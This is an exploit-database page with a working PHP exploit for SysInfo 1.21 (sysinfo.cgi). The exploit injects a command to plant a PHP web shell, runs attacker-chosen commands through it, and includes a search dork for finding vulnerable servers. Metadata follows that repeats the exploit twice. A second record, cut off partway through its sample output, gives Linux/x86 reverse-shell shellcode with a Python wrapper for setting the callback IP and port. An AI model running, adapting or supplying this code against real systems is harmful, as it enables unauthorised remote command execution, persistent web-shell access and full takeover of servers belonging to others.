ID 1337DAY-ID-359
Type zdt
Reporter rgod
Modified 2006-04-14T00:00:00
Description
Exploit for cgi platform in category web applications
===========================================================
SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit
===========================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "sysinfo.cgi 1.21 remote cmmnds xctn \r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: inurl:sysinfo.cgi ext:cgi\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to sysinfo.cgi\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /cgi-bin/sysinfo/ \n";
echo "php ".$argv[0]." localhost /cgi-bin/sysinfo/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost /cgi-bin/ ls -la -P1.1.1.1:80\r\n";
die;
}
/* tested on sysinfo.cgi v1.21:
http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]
you don't see any output but you can redirect some shellcode to some file
also you can disclose www path:
http;//[target]/cgi-bin/sysinfo.cgi?action=debugger
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//step 1 -> retrieve application path
$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("name=\"pfad\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$pfad=$temp2[0];
if ($pfad=='') {die("cannot retrieve document root...\r\n");}
echo "document root ->".$pfad."\r\n";
//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric
$temp=";echo \<?php passtrhu\(\\\$_GET[cmd]\)?\> > ".$pfad."/phpinfo.php";
$temp=urlencode($temp);
$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
//step 3 -> launch commands
$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
echo $html;
?>
# 0day.today [2018-02-17] #
{"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:42:05", "bulletin": {"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:42:05"}}, "hash": "28f88d483b05a0bbe6194a97e9d197bbb228dc9c1012c39f99b986d271f6587b", "description": "Exploit for cgi platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:42:05", "edition": 1, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "http://0day.today/exploit/description/359", "modified": "2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "810ecb2ef37210833f0536b341b147a9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "4fed0d8b7a47738c0ff917619635fba3", "key": "sourceHref"}, {"hash": "5d7e29811c87ed83936a31ccde4cdf65", "key": "href"}], "objectVersion": "1.0"}}], "description": "Exploit for cgi platform in category web applications", "hash": "52f9b316a81971e3a47ac2ec1d014fc89fcb1895ed825e215903bd450530e6b4", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31462", "1337DAY-ID-30511", "1337DAY-ID-30347", "1337DAY-ID-29906", "1337DAY-ID-29629", "1337DAY-ID-29512", "1337DAY-ID-28869", "1337DAY-ID-28299", "1337DAY-ID-27576"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2017-266-02.NASL", "F5_BIGIP_SOL52320548.NASL", "MACOSX_SECUPD_10_11_6_2017-002__10_10_5_2017-002.NASL", "EULEROS_SA-2017-1002.NASL"]}, {"type": "slackware", "idList": ["SSA-2017-266-02"]}, {"type": "f5", "idList": ["F5:K52320548"]}, {"type": "exploitdb", "idList": ["EDB-ID:42466"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810984"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IIS/IIS_WEBDAV_SCSTORAGEPATHFROMURL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}], "modified": "2018-02-17T21:31:00"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-02-17T21:31:00", "edition": 2, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "https://0day.today/exploit/description/359", "modified": "2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 33, "cvelist": [], "sourceHref": "https://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "d540995d88d9c9be9621d23a33c61f0e", "key": "href"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "ad1187a0bb3a578d421438160684ccee", "key": "sourceData"}, {"hash": "89489db3e8c9b5675ad81e87d4c4ffb0", "key": "sourceHref"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-05-04T03:50:52", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32652", "href": "https://0day.today/exploit/description/32652", "title": "Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper", "type": "zdt", "sourceData": "# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper\r\n# Exploit Author: Dave Sully \r\n# Vendor Homepage: \r\n# Software Link: NA\r\n# Version: NA\r\n# Tested on: Ubuntu 16.04\r\n# CVE : NA\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# This is the raw assembly \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n; Filename: reverse_shell.nasm\r\n; Author: Dave Sully\r\n; Website: http://suls.co.uk\r\n; Purpose: Reverse shell in x86 assembly \r\n \r\nglobal _start \r\n \r\nsection .text\r\n_start:\r\n \r\n ; Clear everthing we are using \r\n xor eax, eax \r\n xor ebx, ebx \r\n xor ecx, ecx \r\n xor edx, edx \r\n xor esi, esi\r\n xor edi, edi\r\n \r\n ; Define structure for socket \r\n ; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here (127.0.0.1)\r\n ; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes \r\n ; Easiest way around this is to XOR the value with 0xffffffff\r\n mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff\r\n xor edi, 0xffffffff\r\n push edi\r\n push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 \r\n push word 0x2 ; push 2 to the stack (AF-INET) \r\n \r\n ; Create socket \r\n ; s = socket(AF_INET, SOCK_STREAM, 0)\r\n mov ax, 0x167 ; Syscall 359 (socket)\r\n mov bl, 0x2 ; AF-INET (2) \r\n mov cl, 0x1 ; Sock stream (1) \r\n ; dl should already be zero \r\n int 0x80 ; call system interupt to create socket \r\n xchg esi, eax ; socket file descriptor now stored in esi \r\n \r\n ; Connect socket \r\n ; connect(s, (struct sockaddr *)&addr, sizeof(addr));\r\n mov ax, 0x16a ; Syscall 362 connect \r\n mov ebx, esi ; Move socket file descriptor into ebx \r\n mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it \r\n mov dl, 0x10 ; Size of structure (16)\r\n int 0x80 ; call system interupt to create connect \r\n \r\n ; Dup input output and error file descriptors \r\n ; dup2(s, 0); // Dup2 sycall = 63 \r\n xor eax, eax ; Clear eax \r\n mov ebx, esi ; move socket id to ebx \r\n xor ecx, ecx ; Clear ecx \r\n mov cl, 0x2 ; set ecx to 2 \r\nloop:\r\n mov al, 0x3f ; syscall 63 \r\n int 0x80 ; call dup 2 \r\n dec ecx ; decrease ecx by 1 \r\n jns loop ; jump if not signed back to loop, this should cycle 2,1,0\r\n \r\n ; Execute Shell \r\n ; execve(\"/bin/sh\",0 ,0); // Execve syscall = 11\r\n ; (const char *filename, char *const argv[], char *const envp[]);\r\n xor eax,eax ; null eax \r\n mov al, 0xb ; syscall 11 into eax\r\n xor ebx, ebx ; zero ebx \r\n push ebx ; push a null string to the stack to terminate our string \r\n push 0x68732f2f ; hs//\r\n push 0x6e69622f ; nib/\r\n mov ebx, esp ; point ebx at the stack\r\n xor ecx, ecx ; clear ecx and edx as they are used in the syscall \r\n xor edx, edx\r\n int 0x80 \r\n \r\nsection .data\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### Compile and link as follows \r\n \r\nnasm -f elf32 -o reverse_shell.o reverse_shell.nasm \r\ngcc -o reverse_shell reverse_shell.o \r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### To configure IP and port use the following python3 wrapper script \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n \r\n#!/usr/bin/env python3 \r\n# File: wrapper.py\r\n# Author: Dave Sully \r\n# Reverse shell wrapper in python3 \r\n# Usage: python3 wrapper.py 192.168.1.1 5000\r\n \r\nimport argparse\r\nimport socket \r\nfrom struct import unpack\r\n \r\nprint(\"\\n*****************************************\")\r\nprint(\"***** Reverse shell wrapper script ******\")\r\nprint(\"*****************************************\")\r\n \r\n# Grab command line args (ip and port) \r\nparser = argparse.ArgumentParser() \r\nparser.add_argument(\"ip\")\r\nparser.add_argument(\"port\")\r\nargs = parser.parse_args() \r\n# check port is in a valid range \r\nif ((int(args.port) > 65535) or (int(args.port) < 256)):\r\n print(\"\\nPort number must be between 256 and 65535\\n\")\r\n exit()\r\n \r\n# Xor Function \r\ndef xor_strings(str1,str2):\r\n result = int(str1,16) ^ int(str2,16)\r\n return '{:x}'.format(result)\r\n \r\n# Process IP address\r\nprint(\"\\nIP address: \"+ args.ip)\r\n# Convert IP to Hex \r\nhexip = socket.inet_aton(args.ip).hex() \r\nprint(\"Hex IP Address: \"+hexip)\r\n# Reverse the hex String \r\nrevhexip = hexip[6:8]\r\nrevhexip = revhexip + hexip[4:6]\r\nrevhexip = revhexip + hexip[2:4]\r\nrevhexip = revhexip + hexip[0:2]\r\n# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes \r\nxored_ip = xor_strings(revhexip,\"FFFFFFFF\")\r\nprint(\"XORed reverse hex IP Address: \"+ xored_ip) \r\n \r\n# Process Port\r\nprint(\"\\nPort: \"+args.port)\r\n# Convert Port to hex \r\nhexport = hex(int(args.port)).replace('0x','')\r\nif len(hexport)<4:\r\n hexport = '0'+hexport\r\nprint(\"Hex Port: \"+hexport)\r\nrevhexport = hexport[2:4]+ hexport[0:2] \r\nprint(\"Reverse Hex Port: \"+revhexport)\r\n \r\n# Check for null bytes \r\nif (xored_ip[0:2]==\"00\" or \r\n xored_ip[2:4]==\"00\" or \r\n xored_ip[4:6]==\"00\" or \r\n xored_ip[6:8]==\"00\" or \r\n revhexport[0:2]==\"00\" or \r\n revhexport[2:4]==\"00\"):\r\n print(\"\\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,\")\r\n print(\"shellcode may not work !\\n\")\r\n \r\n# Construct Shellcode \r\nshellcode= \\\r\n\"\\\\x31\\\\xc0\\\\x31\\\\xdb\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\x31\\\\xf6\\\\x31\\\\xff\\\\xbf\" + \\\r\n \"\\\\x\"+ xored_ip[6:8] + \\\r\n \"\\\\x\"+ xored_ip[4:6] + \\\r\n \"\\\\x\"+ xored_ip[2:4] + \\\r\n \"\\\\x\"+ xored_ip[0:2] + \\\r\n\"\\\\x83\\\\xf7\\\\xff\\\\x57\\\\x66\\\\x68\" + \\\r\n \"\\\\x\"+ revhexport[2:4] + \\\r\n \"\\\\x\"+ revhexport[0:2] + \\\r\n\"\\\\x66\\\\x6a\\\\x02\\\\x66\\\\xb8\\\\x67\\\\x01\\\\xb3\\\\x02\\\\xb1\\\\x01\\\\xcd\\\\x80\\\\x96\\\\x66\" + \\\r\n\"\\\\xb8\\\\x6a\\\\x01\\\\x89\\\\xf3\\\\x89\\\\xe1\\\\xb2\\\\x10\\\\xcd\\\\x80\\\\x31\\\\xc0\\\\x89\\\\xf3\" + \\\r\n\"\\\\x31\\\\xc9\\\\xb1\\\\x02\\\\xb0\\\\x3f\\\\xcd\\\\x80\\\\x49\\\\x79\\\\xf9\\\\x31\\\\xc0\\\\xb0\\\\x0b\" + \\\r\n\"\\\\x31\\\\xdb\\\\x53\\\\x68\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe3\" + \\\r\n\"\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\xcd\\\\x80\"\r\n# Output Shellcode \r\nprint(\"\\nShellcode (Length 91 Bytes): \\n\")\r\nprint(shellcode+\"\\n\")\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Example output\r\n \r\n*****************************************\r\n***** Reverse shell wrapper script ******\r\n*****************************************\r\n \r\nIP address: 127.0.0.1\r\nHex IP Address: 7f000001\r\nXORed reverse hex IP Address: feffff80\r\n \r\nPort: 8080\r\nHex Port: 1f90\r\nReverse Hex Port: 901f\r\n \r\nShellcode (Length 91 Bytes): \r\n 